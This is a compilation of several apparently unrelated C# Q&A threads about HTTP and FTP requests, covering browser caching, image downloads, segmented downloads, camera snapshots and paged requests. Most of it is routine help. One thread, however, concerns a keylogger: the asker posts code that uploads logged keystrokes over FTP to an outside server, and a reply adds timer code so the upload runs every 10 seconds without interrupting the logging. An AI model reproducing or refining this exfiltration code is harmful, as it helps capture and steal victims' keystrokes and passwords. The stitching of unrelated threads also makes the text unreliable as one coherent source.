I have trouble with the WebBrowser control, or maybe with FTP. I am uploading a picture, and when I navigate the WebBrowser it shows me the old photo, yet the picture I'm uploading reaches the FTP server and gets overwritten. Here is the code:
webBrowser1.Refresh(WebBrowserRefreshOption.Completely);
webBrowser1.Navigate("www.google.com");
openFileDialog1.ShowDialog();
string filename = Path.GetFullPath(openFileDialog1.FileName);
FileInfo toUpload = new FileInfo(@"upload.jpg");
FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://fingercube.co.cc/public_html/objimg/" + toUpload.Name);
request.Method = WebRequestMethods.Ftp.UploadFile;
request.Credentials = new NetworkCredential("username", "pass");
Stream ftpStream = request.GetRequestStream();
FileStream file = File.OpenRead(filename);
int length = 2;
byte[] buffer = new byte[length];
int bytesRead = 0;
do
{
bytesRead = file.Read(buffer, 0, length);
ftpStream.Write(buffer, 0, bytesRead);
}
while (bytesRead != 0);
file.Close();
ftpStream.Close();
webBrowser1.Navigate("http://fingercube.co.cc/objimg/"+toUpload.Name);
It shows me the old photo every time, but the photo is uploaded every time. :(
If the caching suggestion doesn't work, try doing the following:
this.webBrowser1.Navigate("about:blank");
HtmlDocument doc = this.webBrowser1.Document;
doc.Write(string.Empty);
Then navigate to your FTP location.
I had a similar issue while trying to refresh a locally generated HTML page in the web browser, and this fixed it.
The image is cached in the IE cache. You must clear the cache before refreshing the control. Have a look here: http://www.gutgames.com/post/Clearing-the-Cache-of-a-WebBrowser-Control.aspx
Also, a related question on SO: WebBrowser control caching issue
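If you only need to evict the single image rather than clearing the whole cache, one option is the WinINet function DeleteUrlCacheEntry, called via P/Invoke before navigating. This is a minimal sketch of the idea, not the linked article's code, and it reuses the webBrowser1 control from the question:
using System.Runtime.InteropServices;
// Removes one URL from the WinINet/IE cache that the WebBrowser control uses.
[DllImport("wininet.dll", CharSet = CharSet.Auto, SetLastError = true)]
static extern bool DeleteUrlCacheEntry(string lpszUrlName);
void NavigateWithoutCache(string imageUrl)
{
    DeleteUrlCacheEntry(imageUrl);   // a false return just means the URL wasn't cached
    webBrowser1.Navigate(imageUrl);
}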
Got the solution: the problem was with the cache. The easy fix was to make a new request every time.
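For completeness, a minimal sketch of that "new request every time" idea, reusing the webBrowser1 and toUpload names from the question's code; the nocache parameter name is arbitrary:
string imageUrl = "http://fingercube.co.cc/objimg/" + toUpload.Name;
// a unique query string makes the control treat every navigation as a brand-new request
webBrowser1.Navigate(imageUrl + "?nocache=" + DateTime.Now.Ticks);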
I am currently working on a keylogger which saves the user's input to a text document. The document is updated each time the user presses a key.
I want the FTP to constantly update the text document on the server. The issue is that each time it is uploading the text document, it stops until the upload is complete and then continues logging.
I would like to know how can I prevent this from happening.
I read somewhere that there is a way to do this using an async call or something similar, but I cannot find where it was.
I would greatly appreciate any help.
Here is the FTP code I created.
private static void ftp(String name)
{
FtpWebRequest request = (FtpWebRequest)FtpWebRequest.Create(
"ftp://ftp.drivehq.com/test.txt");
request.Method = WebRequestMethods.Ftp.UploadFile;
request.Credentials = new NetworkCredential(username, pass);
request.UsePassive = true;
request.UseBinary = true;
request.KeepAlive = false;
FileStream stream = File.OpenRead(name);
byte[] data = new byte[stream.Length];
stream.Read(data, 0, data.Length);
stream.Close();
Stream reqStream = request.GetRequestStream();
reqStream.Write(data, 0, data.Length);
reqStream.Close();
}
I managed to find a way to fix it. I simply used a timer and I am uploading every 10 seconds. The issue was not FTP interrupting execution, but the constant uploading flooding the program.
As I said, the timer fixed it.
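For reference, a rough sketch of that timer approach, assuming the ftp(String name) method shown above and a known log file path. System.Timers.Timer raises its Elapsed event on a thread-pool thread, so the key logging itself is never blocked by the upload:
using System.Timers;
private static readonly Timer uploadTimer = new Timer(10000);   // fire every 10 seconds

private static void StartPeriodicUpload(string logFile)
{
    uploadTimer.Elapsed += (sender, e) =>
    {
        try
        {
            ftp(logFile);   // the upload method shown above
        }
        catch (WebException)
        {
            // ignore transient network errors; the next tick will retry
        }
    };
    uploadTimer.AutoReset = true;
    uploadTimer.Start();
}
If an upload can take longer than the interval, two uploads may overlap; guarding with a flag, or turning AutoReset off and restarting the timer after each upload, avoids that.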
I want to implement a method to download an image from a website to my laptop.
public static void DownloadRemoteImageFile(string uri, string fileName)
{
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(uri);
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
if ((response.StatusCode == HttpStatusCode.OK ||
response.StatusCode == HttpStatusCode.Moved ||
response.StatusCode == HttpStatusCode.Redirect) &&
response.ContentType.StartsWith("image", StringComparison.OrdinalIgnoreCase))
{
//if the remote file was found, download it
using (Stream inputStream = response.GetResponseStream())
using (Stream outputStream = File.OpenWrite(fileName))
{
byte[] buffer = new byte[4096];
int bytesRead;
do
{
bytesRead = inputStream.Read(buffer, 0, buffer.Length);
outputStream.Write(buffer, 0, bytesRead);
} while (bytesRead != 0);
}
}
}
But the ContentType of the response is never "image/jpg" or "image/png"; it is always "text/html". I think that's why, after I save the files locally, they have incorrect content and I cannot view them.
Does anyone have a solution?
Thanks
Try setting the content type to a specific image type:
Response.ContentType = "image/jpeg";
You can use this code, based on the JpegBitmapDecoder class:
JpegBitmapDecoder decoder = new JpegBitmapDecoder(YourImageStreamSource, BitmapCreateOptions.PreservePixelFormat, BitmapCacheOption.Default);
//here you can adjust YourImageStreamSource with the outputStream value
BitmapSource bitmapSource = decoder.Frames[0];
//re-encode the decoded frame and save it as a JPEG file
JpegBitmapEncoder encoder = new JpegBitmapEncoder();
encoder.Frames.Add(BitmapFrame.Create(bitmapSource));
using (FileStream output = File.Create("YourImage.jpg"))
{
encoder.Save(output);
}
Link : http://msdn.microsoft.com/en-us/library/aa970689.aspx
It may be possible that the sites you wish to get the image(s) from require a cookie. Sometimes when we visit such a site in a browser we don't notice it, but the browser actually hits the site for a moment, quickly reloads, and picks up the cookie along the way; on the reload it sends that cookie back, the site accepts it, and only then returns the image.
To elaborate: your method is doing only half of what your browser actually does, one GET request instead of two. The first request obtains the cookie, and the second one actually gets the image.
Information from (and maybe a bit related): C# generate a cookie dynamically that site will accept?
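If a cookie really is the missing piece, a rough sketch of the two-request approach could look like this, using the uri and fileName parameters of the method in the question; the first request exists only to collect whatever cookies the site sets:
CookieContainer cookies = new CookieContainer();

HttpWebRequest first = (HttpWebRequest)WebRequest.Create(uri);
first.CookieContainer = cookies;
using (first.GetResponse()) { }   // discard the body, keep the cookies

HttpWebRequest second = (HttpWebRequest)WebRequest.Create(uri);
second.CookieContainer = cookies;
using (HttpWebResponse response = (HttpWebResponse)second.GetResponse())
using (Stream inputStream = response.GetResponseStream())
using (Stream outputStream = File.OpenWrite(fileName))
{
    inputStream.CopyTo(outputStream);   // .NET 4+; use a read/write loop on older versions
}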
Your code is OK, but what you are trying to do is often considered undesirable behavior by web site owners. Most sites want you to see images on the site but not download them at random. You can search for the opposite of your question to learn which techniques and protections you are up against.
I strongly recommend reading the usage agreement, or any similar document, on the site you are trying to scrape before continuing.
I am referring to this article to understand file downloads using C#.
The code reads the stream in the traditional way, e.g.
(bytesSize = strResponse.Read(downBuffer, 0, downBuffer.Length)) > 0
How can I divide a file to be downloaded into multiple segments, so that I can download separate segments in parallel and merge them?
using (WebClient wcDownload = new WebClient())
{
try
{
// Create a request to the file we are downloading
webRequest = (HttpWebRequest)WebRequest.Create(txtUrl.Text);
// Set default authentication for retrieving the file
webRequest.Credentials = CredentialCache.DefaultCredentials;
// Retrieve the response from the server
webResponse = (HttpWebResponse)webRequest.GetResponse();
// Ask the server for the file size and store it
Int64 fileSize = webResponse.ContentLength;
// Open the URL for download
strResponse = wcDownload.OpenRead(txtUrl.Text);
// Create a new file stream where we will be saving the data (local drive)
strLocal = new FileStream(txtPath.Text, FileMode.Create, FileAccess.Write, FileShare.None);
// It will store the current number of bytes we retrieved from the server
int bytesSize = 0;
// A buffer for storing and writing the data retrieved from the server
byte[] downBuffer = new byte[2048];
// Loop through the buffer until the buffer is empty
while ((bytesSize = strResponse.Read(downBuffer, 0, downBuffer.Length)) > 0)
{
// Write the data from the buffer to the local hard drive
strLocal.Write(downBuffer, 0, bytesSize);
// Invoke the method that updates the form's label and progress bar
this.Invoke(new UpdateProgessCallback(this.UpdateProgress), new object[] { strLocal.Length, fileSize });
}
}
catch (WebException)
{
// exception handling from the article is omitted in this excerpt
}
}
You need several threads to accomplish that.
First you start one download thread, creating a WebClient and getting the file size. Then you can start several new threads, each of which adds a download range header.
You need logic that keeps track of the downloaded parts and creates new download parts when one finishes.
http://msdn.microsoft.com/de-de/library/system.net.httpwebrequest.addrange.aspx
I noticed that the WebClient implementation sometimes behaves strangely, so I still recommend implementing your own HTTP client if you really want to write a "big" download program.
PS: thanks to user svick
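As a hedged sketch of the AddRange idea (the method name and part-file handling here are made up for illustration): each segment asks the server for one byte range and writes it to its own part file. A real downloader would run one such call per segment in parallel, concatenate the parts afterwards, and check that the server actually supports range requests:
static void DownloadSegment(string url, long from, long to, string partFile)
{
    HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
    request.AddRange(from, to);   // request only bytes from..to (the long overload needs .NET 4)
    using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
    using (Stream responseStream = response.GetResponseStream())
    using (FileStream partStream = File.Create(partFile))
    {
        responseStream.CopyTo(partStream);
    }
}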
I have a monitoring system and I want to save a snapshot from a camera when an alarm triggers.
I have tried many methods to do that, and they all work: stream the snapshot from the camera, then save it as a JPG on the PC (JPG format, 1280x1024, about 140 KB). That part is fine.
But my problem is the application's performance.
The app needs about 20-30 seconds to read the stream, which is not acceptable because this method will be called every 2 seconds. I need to know what is wrong with that code and how I can make it much faster.
Many thanks in advance.
Code:
string sourceURL = "http://192.168.0.211/cgi-bin/cmd/encoder?SNAPSHOT";
byte[] buffer = new byte[200000];
int read, total = 0;
WebRequest req = (WebRequest)WebRequest.Create(sourceURL);
req.Credentials = new NetworkCredential("admin", "123456");
WebResponse resp = req.GetResponse();
Stream stream = resp.GetResponseStream();
while ((read = stream.Read(buffer, total, 1000)) != 0)
{
total += read;
}
Bitmap bmp = (Bitmap)Bitmap.FromStream(new MemoryStream(buffer, 0,total));
string path = JPGName.Text+".jpg";
bmp.Save(path);
I very much doubt that this code is the cause of the problem, at least for the first method call (but read further below).
Technically, you could produce the Bitmap without saving to a memory buffer first, or, if you don't need to display the image as well, you could save the raw data without ever constructing a Bitmap, but that's not going to win you multiple seconds. Have you checked how long it takes to download the image from that URL using a browser, wget, curl or whatever other tool? I suspect something is going on at the encoder's end.
Something you should do is clean up your resources and close the stream properly. This can potentially cause the problem if you call this method regularly, because .NET only opens a few connections to the same host at any one time.
// Make sure the stream gets closed once we're done with it
using (Stream stream = resp.GetResponseStream())
{
// A larger buffer size would be beneficial, but it's not going
// to make a significant difference.
while ((read = stream.Read(buffer, total, 1000)) != 0)
{
total += read;
}
}
I cannot test the network behavior of the WebResponse stream, but you handle the data twice (once in your read loop and once through the MemoryStream).
I don't think that's the whole problem, but I'd give this a try:
string sourceURL = "http://192.168.0.211/cgi-bin/cmd/encoder?SNAPSHOT";
WebRequest req = (WebRequest)WebRequest.Create(sourceURL);
req.Credentials = new NetworkCredential("admin", "123456");
WebResponse resp = req.GetResponse();
Stream stream = resp.GetResponseStream();
Bitmap bmp = (Bitmap)Bitmap.FromStream(stream);
string path = JPGName.Text + ".jpg";
bmp.Save(path);
Try reading bigger pieces of data than 1000 bytes at a time. I see no problem with, for example,
read = stream.Read(buffer, 0, buffer.Length);
Try this to download the file.
using(WebClient webClient = new WebClient())
{
webClient.DownloadFile("http://192.168.0.211/cgi-bin/cmd/encoder?SNAPSHOT", @"c:\Temp\myPic.jpg");
}
You can use a DateTime to put a unique stamp on the shot.
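For example, a sketch only, reusing the camera URL and credentials from the question (the folder is arbitrary):
using (WebClient webClient = new WebClient())
{
    webClient.Credentials = new NetworkCredential("admin", "123456");
    string path = @"c:\Temp\snapshot_" + DateTime.Now.ToString("yyyyMMdd_HHmmss") + ".jpg";
    webClient.DownloadFile("http://192.168.0.211/cgi-bin/cmd/encoder?SNAPSHOT", path);
}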
Here's the purpose of my console program: make a web request > save the results from the web request > use the query string to get the next page from the web request > save those results > use the query string to get the next page from the web request, and so on.
So here's some pseudocode for how I set the code up.
for (int i = 0; i < 3; i++)
{
strPageNo = Convert.ToString(i);
//creates the url I want, with incrementing pages
strURL = "http://www.website.com/results.aspx?page=" + strPageNo;
//makes the web request
wrGETURL = WebRequest.Create(strURL);
//gets the web page for me
objStream = wrGETURL.GetResponse().GetResponseStream();
//for reading web page
objReader = new StreamReader(objStream);
//--------
// -snip- code that saves it to file, etc.
//--------
objStream.Close();
objReader.Close();
//so the server doesn't get hammered
System.Threading.Thread.Sleep(1000);
}
Pretty simple, right? The problem is that even though it increments the page number to request a different web page, I get the exact same results page each time the loop runs.
i IS incrementing correctly, and I can cut and paste the URL that strURL builds into a web browser and it works just fine.
I can manually type in &page=1, &page=2, &page=3 and it will return the correct pages. Somehow putting the increment in there screws it up.
Does it have anything to do with sessions, or what? I make sure I close both the stream and the reader before the loop repeats...
Have you tried creating a new WebRequest object each time through the loop? It could be that the Create() method isn't adequately flushing out all of its old data.
Another thing to check is that the response stream is adequately flushed out before the next loop iteration.
This code works fine for me:
var urls = new [] { "http://www.google.com", "http://www.yahoo.com", "http://www.live.com" };
foreach (var url in urls)
{
WebRequest request = WebRequest.Create(url);
using (Stream responseStream = request.GetResponse().GetResponseStream())
using (Stream outputStream = new FileStream("file" + DateTime.Now.Ticks.ToString(), FileMode.Create, FileAccess.Write, FileShare.None))
{
const int chunkSize = 1024;
byte[] buffer = new byte[chunkSize];
int bytesRead;
while ((bytesRead = responseStream.Read(buffer, 0, buffer.Length)) > 0)
{
byte[] actual = new byte[bytesRead];
Buffer.BlockCopy(buffer, 0, actual, 0, bytesRead);
outputStream.Write(actual, 0, actual.Length);
}
}
Thread.Sleep(1000);
}
Just a suggestion: try disposing the Stream and the Reader. I've seen some weird cases where not disposing objects like these, and reusing them in loops, can yield some wacky results...
That URL doesn't quite make sense to me unless you are using MVC or something that can interpret the querystring correctly.
http://www.website.com/results.aspx&page=
should be:
http://www.website.com/results.aspx?page=
Some browsers will accept poorly formed URLs and render them fine; others may not, which may be the problem with your console app.
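One way to keep the query separator from going wrong is to let UriBuilder assemble the URL; a small sketch using the host and parameter names from the question:
var builder = new UriBuilder("http://www.website.com/results.aspx");
builder.Query = "page=" + strPageNo;      // UriBuilder supplies the leading '?'
string strURL = builder.Uri.ToString();   // e.g. http://www.website.com/results.aspx?page=2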
Here's my terrible, hackish workaround:
Make another console app that calls THIS one, where the first console app passes an argument that gets appended to the end of strURL. It works, but I feel so dirty.